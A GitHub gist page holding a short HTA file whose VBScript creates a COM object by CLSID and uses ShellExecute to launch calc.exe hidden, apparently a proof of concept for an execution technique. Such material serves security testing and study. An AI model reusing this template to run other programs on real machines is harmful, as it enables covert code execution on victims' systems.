-
-
Save binarytrails/b91659165ce158a5f5e840ef48093971 to your computer and use it in GitHub Desktop.
com.hta
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script language="VBScript"> | |
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") | |
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0 | |
self.close | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment